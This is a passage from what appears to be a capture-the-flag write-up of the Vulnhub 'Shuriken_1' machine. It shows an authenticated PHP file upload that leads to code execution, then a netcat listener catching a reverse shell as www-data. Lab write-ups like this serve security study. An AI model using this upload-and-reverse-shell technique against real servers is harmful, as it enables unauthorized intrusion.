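    print(upload("probe.php", b"<?php echo 'upload-ok'; ?>", *CREDS))
```

Because the server keeps the client-supplied extension and the upload directory is web-accessible, any authenticated user of this virtual host gets code execution as www-data, which is exactly what the reverse shell below confirms.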
┌──(kali㉿kali)-[~/Vulnhub/Shuriken_1]
└─$ sudo nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.238] 55712
Linux shuriken 5.4.0-47-generic #51~18.04.1-Ubuntu SMP Sat Sep 5 14:35:50 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 13:14:22 up  1:08,  0 users,  load average: 0.00, 0.00, 0.03
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ 

Privilege escalation